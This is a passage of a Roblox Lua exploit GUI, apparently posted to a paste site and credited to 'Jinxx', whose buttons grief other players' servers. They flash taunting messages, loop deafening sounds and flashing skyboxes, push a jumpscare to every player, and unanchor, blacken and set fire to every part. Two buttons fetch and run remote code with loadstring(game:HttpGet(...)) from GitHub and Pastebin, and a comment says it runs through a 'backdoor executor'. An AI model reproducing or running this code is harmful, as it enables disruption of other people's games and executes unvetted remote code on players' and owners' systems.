  664. TextButton_9.MouseButton1Down:connect(function()
  665. local m = Instance.new("Message", game.Workspace)
  666. m.Text = "k00p is back muahahahahaha!"
  667. wait(3)
  668. m.Text = "Nubs!"
  669. wait(2)
  670. m.Text = "You cannot ban me HAHA!"
  671. wait(5)
  672.  
  673. local unit = 10
  674. wait(1)
  675. for i = 1, 10 do
  676. unit = unit - 1
  677. m.Text = "Dont forget that I'll never get banned!"
  678. wait(1)
  679. end
  680.  
  681. m.Text = "hahahahahaha!!!!"
  682.  
  683. local prey = nil
  684. local parts = script.Parent:GetChildren()
  685.  
  686. for i = 1,#parts do
  687. if (parts[i].className == "Part") then
  688. if (prey ~= nil)then
  689. prey:Destroy()
  690. end
  691. prey = parts[i]
  692. end
  693. end
  694. end)
  695. TextButton_10.Parent = Main
  696. TextButton_10.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  697. TextButton_10.BorderSizePixel = 3
  698. TextButton_10.Position = UDim2.new(0.498694509, 0, 0.637130797, 0)
  699. TextButton_10.Size = UDim2.new(0, 68, 0, 30)
  700. TextButton_10.Font = Enum.Font.PatrickHand
  701. TextButton_10.Text = "cOOlkidd remake"
  702. TextButton_10.TextColor3 = Color3.fromRGB(0, 0, 0)
  703. TextButton_10.TextScaled = true
  704. TextButton_10.TextSize = 14.000
  705. TextButton_10.TextWrapped = true
  706. TextButton_10.MouseButton1Down:connect(function()
  707. loadstring(game:HttpGet("https://raw.githubusercontent.com/sinret/rbxscript.com-scripts-reuploads-/main/ckid", true))()
  708. end)
  709. TextButton_11.Parent = Main
  710. TextButton_11.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  711. TextButton_11.BorderSizePixel = 3
  712. TextButton_11.Position = UDim2.new(0.263707578, 0, 0.637130797, 0)
  713. TextButton_11.Size = UDim2.new(0, 68, 0, 30)
  714. TextButton_11.Font = Enum.Font.PatrickHand
  715. TextButton_11.Text = "Particals"
  716. TextButton_11.TextColor3 = Color3.fromRGB(0, 0, 0)
  717. TextButton_11.TextScaled = true
  718. TextButton_11.TextSize = 14.000
  719. TextButton_11.TextWrapped = true
  720. TextButton_11.MouseButton1Down:connect(function()
  721. pe = Instance.new("ParticleEmitter",game.Players.LocalPlayer.Character.Torso)
  722. pe.Texture = "http://roblox.com/asset/?id=2815989294"
  723. pe.VelocitySpread = 50 end)
  724. TextButton_12.Parent = Main
  725. TextButton_12.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  726. TextButton_12.BorderSizePixel = 3
  727. TextButton_12.Position = UDim2.new(0.0208877325, 0, 0.637130797, 0)
  728. TextButton_12.Size = UDim2.new(0, 68, 0, 30)
  729. TextButton_12.Font = Enum.Font.PatrickHand
  730. TextButton_12.Text = "Aura Destrozer 1"
  731. TextButton_12.TextColor3 = Color3.fromRGB(0, 0, 0)
  732. TextButton_12.TextScaled = true
  733. TextButton_12.TextSize = 14.000
  734. TextButton_12.TextWrapped = true
  735. TextButton_12.MouseButton1Down:connect(function()
  736. loadstring(game:HttpGet("https://pastebin.com/raw/f1Q3KhR7"))()
  737. end)
  738. TextButton_13.Parent = Main
  739. TextButton_13.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  740. TextButton_13.BorderSizePixel = 3
  741. TextButton_13.Position = UDim2.new(0.0208877325, 0, 0.83544302, 0)
  742. TextButton_13.Size = UDim2.new(0, 68, 0, 30)
  743. TextButton_13.Font = Enum.Font.PatrickHand
  744. TextButton_13.Text = "music"
  745. TextButton_13.TextColor3 = Color3.fromRGB(0, 0, 0)
  746. TextButton_13.TextScaled = true
  747. TextButton_13.TextSize = 14.000
  748. TextButton_13.TextWrapped = true
  749. TextButton_13.MouseButton1Down:Connect(function()
  750. local music = Instance.new("Sound", game.Workspace)
  751. music.SoundId = "rbxassetid://8683380188"
  752. music.Volume = 1
  753. music.Looped = true
  754. music.PlayOnRemove = true
  755. music:Play()
  756. end)
  757. TextButton_14.Parent = Main
  758. TextButton_14.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  759. TextButton_14.BorderSizePixel = 3
  760. TextButton_14.Position = UDim2.new(0.263707578, 0, 0.83544302, 0)
  761. TextButton_14.Size = UDim2.new(0, 68, 0, 30)
  762. TextButton_14.Font = Enum.Font.PatrickHand
  763. TextButton_14.Text = "Koopkidd skyblock"
  764. TextButton_14.TextColor3 = Color3.fromRGB(0, 0, 0)
  765. TextButton_14.TextScaled = true
  766. TextButton_14.TextSize = 14.000
  767. TextButton_14.TextWrapped = true
  768. TextButton_14.MouseButton1Down:Connect(function()
  769. wait(1)--set this to how much time between messages
  770. msg = Instance.new ("Hint")
  771. msg.Parent = game.Workspace
  772. msg.Text = "https://discord.gg/smx6YETa"
  773. wait(6)
  774. msg:remove()
  775. wait(3) local music = Instance.new("Sound", game.Workspace)
  776. music.SoundId = "rbxassetid://"
  777. music.Volume = 1
  778. music.Looped = true
  779. music.PlayOnRemove = true
  780. music:Play() -- script is not fe only fe at backdoor executor
  781. -- k00pkidd edit
  782. imageOne = "http://www.roblox.com/asset/?id=11588317701"
  783. imageTwo = "http://www.roblox.com/asset/?id=11588317701"
  784. imageThree = "http://www.roblox.com/asset/?id=11588317701"
  785. imageFour = "http://www.roblox.com/asset/?id=11588317701"
  786. imageFive = "http://www.roblox.com/asset/?id=11588317701"
  787. imageSix = "http://www.roblox.com/asset/?id=11588317701"
  788. imageSeven = "http://www.roblox.com/asset/?id=11588317701"
  789. imageEight = "http://www.roblox.com/asset/?id=11588317701"
  790. Spooky = Instance.new("Sound", game.Workspace)
  791. Spooky.Name = "Spooky"
  792. Spooky.SoundId = "rbxassetid://4808613510"
  793. Spooky.Volume = 1500
  794. Spooky.Looped = true
  795. Spooky:Play()
  796. Sky = Instance.new("Sky", game.Lighting)
  797. Sky.SkyboxBk = imageOne
  798. Sky.SkyboxDn = imageOne
  799. Sky.SkyboxFt = imageOne
  800. Sky.SkyboxLf = imageOne
  801. Sky.SkyboxRt = imageOne
  802. Sky.SkyboxUp = imageOne
  803. while true do
  804. Sky.SkyboxBk = imageOne
  805. Sky.SkyboxDn = imageOne
  806. Sky.SkyboxFt = imageOne
  807. Sky.SkyboxLf = imageOne
  808. Sky.SkyboxRt = imageOne
  809. Sky.SkyboxUp = imageOne
  810. wait(0.25)
  811. Sky.SkyboxBk = imageTwo
  812. Sky.SkyboxDn = imageTwo
  813. Sky.SkyboxFt = imageTwo
  814. Sky.SkyboxLf = imageTwo
  815. Sky.SkyboxRt = imageTwo
  816. Sky.SkyboxUp = imageTwo
  817. wait(0.25)
  818. Sky.SkyboxBk = imageThree
  819. Sky.SkyboxDn = imageThree
  820. Sky.SkyboxFt = imageThree
  821. Sky.SkyboxLf = imageThree
  822. Sky.SkyboxRt = imageThree
  823. Sky.SkyboxUp = imageThree
  824. wait(0.25)
  825. Sky.SkyboxBk = imageFour
  826. Sky.SkyboxDn = imageFour
  827. Sky.SkyboxFt = imageFour
  828. Sky.SkyboxLf = imageFour
  829. Sky.SkyboxRt = imageFour
  830. Sky.SkyboxUp = imageFour
  831. wait(0.25)
  832. Sky.SkyboxBk = imageFive
  833. Sky.SkyboxDn = imageFive
  834. Sky.SkyboxFt = imageFive
  835. Sky.SkyboxLf = imageFive
  836. Sky.SkyboxRt = imageFive
  837. Sky.SkyboxUp = imageFive
  838. wait(0.25)
  839. Sky.SkyboxBk = imageSix
  840. Sky.SkyboxDn = imageSix
  841. Sky.SkyboxFt = imageSix
  842. Sky.SkyboxLf = imageSix
  843. Sky.SkyboxRt = imageSix
  844. Sky.SkyboxUp = imageSix
  845. wait(0.25)
  846. Sky.SkyboxBk = imageSeven
  847. Sky.SkyboxDn = imageSeven
  848. Sky.SkyboxFt = imageSeven
  849. Sky.SkyboxLf = imageSeven
  850. Sky.SkyboxRt = imageSeven
  851. Sky.SkyboxUp = imageSeven
  852. wait(0.25)
  853. Sky.SkyboxBk = imageEight
  854. Sky.SkyboxDn = imageEight
  855. Sky.SkyboxFt = imageEight
  856. Sky.SkyboxLf = imageEight
  857. Sky.SkyboxRt = imageEight
  858. Sky.SkyboxUp = imageEight
  859. wait(0.25)
  860. end
  861.  
  862. end)
  863. TextButton_15.Parent = Main
  864. TextButton_15.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  865. TextButton_15.BorderSizePixel = 3
  866. TextButton_15.Position = UDim2.new(0.498694539, 0, 0.83544302, 0)
  867. TextButton_15.Size = UDim2.new(0, 68, 0, 30)
  868. TextButton_15.Font = Enum.Font.PatrickHand
  869. TextButton_15.Text = "Jumpscare"
  870. TextButton_15.TextColor3 = Color3.fromRGB(0, 0, 0)
  871. TextButton_15.TextScaled = true
  872. TextButton_15.TextSize = 14.000
  873. TextButton_15.TextWrapped = true
  874. TextButton_15.MouseButton1Down:Connect(function()
  875. local jumpscareSound = Instance.new("Sound", workspace)
  876. jumpscareSound.Name = "JumpscareSound"
  877. jumpscareSound.Volume = 9999999999999999
  878. jumpscareSound.Pitch = 0.76
  879. jumpscareSound.SoundId = "rbxassetid://7006487793"
  880.  
  881. local jumpscareGUI = Instance.new("ScreenGui", nil)
  882. jumpscareGUI.Name = "Jumpscare"
  883. local image = Instance.new("ImageLabel", jumpscareGUI)
  884. image.Name = "JumpscareImage"
  885. image.BackgroundColor3 = Color3.new(0, 0, 0)
  886. image.BorderColor3 = Color3.new(255, 255, 255)
  887. image.BorderSizePixel = 0
  888. image.Size = UDim2.new(1, 0, 1, 0)
  889. image.Image = "http://www.roblox.com/asset/?id=11588317701"
  890. image.Active = true
  891.  
  892. for i, c in pairs(game.Players:GetChildren()) do
  893. local jumpscareClone = jumpscareGUI:Clone()
  894. jumpscareClone.Parent = c.PlayerGui
  895. end
  896. jumpscareSound:Play()
  897. wait(1)
  898. jumpscareSound:Destroy()
  899. for i, c in pairs(game.Players:GetChildren()) do
  900. c.PlayerGui.Jumpscare:Destroy()
  901. end
  902. end)
  903. TextButton_16.Parent = Main
  904. TextButton_16.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  905. TextButton_16.BorderSizePixel = 3
  906. TextButton_16.Position = UDim2.new(0.736292481, 0, 0.83544302, 0)
  907. TextButton_16.Size = UDim2.new(0, 68, 0, 30)
  908. TextButton_16.Font = Enum.Font.PatrickHand
  909. TextButton_16.Text = "Abuser Game"
  910. TextButton_16.TextColor3 = Color3.fromRGB(0, 0, 0)
  911. TextButton_16.TextScaled = true
  912. TextButton_16.TextSize = 14.000
  913. TextButton_16.TextWrapped = true
  914. TextButton_16.MouseButton1Down:Connect(function()
  915. local parts = {}
  916. function scan(p)
  917. for _,target in pairs(p:GetChildren()) do
  918. if target:IsA("BasePart") then
  919. table.insert(parts,target) -- target is the actual parts!
  920. target.Anchored = false
  921. target.BrickColor = BrickColor.new("black")
  922. local sb = Instance.new("SelectionBox", target)
  923. sb.Color3 = Color3.new(255, 0, 0)
  924. sb.SurfaceColor3 = Color3.new(170, 0, 0)
  925. sb.Adornee = target
  926. local pe = Instance.new("ParticleEmitter", target)
  927. pe.Name = "10101110010011"
  928. pe.Texture = "rbxassetid://"
  929. pe.Rate = 10
  930. pe.SpreadAngle = Vector2.new(-90, 90)
  931. local pe2 = Instance.new("ParticleEmitter", target)
  932. pe2.Name = ""
  933. pe2.Texture = "rbxassetid://"
  934. pe2.Rate = 5
  935. pe2.SpreadAngle = Vector2.new(-90, 90)
  936. local bb = Instance.new("BillboardGui", target)
  937. bb.Size = UDim2.new(5,0 , 2,0)
  938. bb.AlwaysOnTop = true
  939. local randomtext = {
  940. "",
  941. "",
  942. ""
  943. }
  944. local label = Instance.new("TextLabel", bb)
  945. label.Size = UDim2.new(1,0 , 1,0)
  946. label.TextScaled = true
  947. label.TextWrapped = true
  948. label.BackgroundTransparency = 1
  949. local brickcolor = BrickColor.new("Really red")
  950. label.TextColor3 = brickcolor.Color
  951. label.Font = "ArialBold"
  952. label.TextSize = 0
  953. local chosentext = randomtext[math.random(1, #randomtext)]
  954. label.Text = chosentext
  955. local fire = Instance.new("Fire", target)
  956. fire.Size = 20
  957. fire.Heat = 30
  958. end
  959. scan(target)
  960. end
  961. end
  962. scan(game.Workspace)
  963. --print(#parts .. (#parts == 1 and " brick " or " bricks ") .. "counted")
  964. parts = {}
  965. wait(1) end)
  966. TextLabel_2.Parent = Main
  967. TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  968. TextLabel_2.BorderSizePixel = 4
  969. TextLabel_2.Position = UDim2.new(-0.0652741492, 0, 0.995780587, 0)
  970. TextLabel_2.Size = UDim2.new(0, 429, 0, 41)
  971. TextLabel_2.Font = Enum.Font.PatrickHand
  972. TextLabel_2.Text = "Script Made By Jinxx"
  973. TextLabel_2.TextColor3 = Color3.fromRGB(225, 0, 3)
  974. TextLabel_2.TextScaled = true
  975. TextLabel_2.TextSize = 14.000
  976. TextLabel_2.TextWrapped = true
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement